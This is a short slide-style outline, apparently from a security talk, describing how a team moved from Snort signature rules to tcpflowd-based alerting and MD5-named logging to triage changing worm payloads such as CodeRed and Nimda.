Payload identification

Originally attempted triage using Snort
Rules insufficient to match changing payloads
e.g. CodeRed truncation, Nimda tftp commands
Need alerting on new payloads, not on known matches
Automated alerting via tcpflowd
Payloads named by MD5 checksum
Logging proceeds without classification
Manual triage, aided by ad-hoc TCL and shell scripts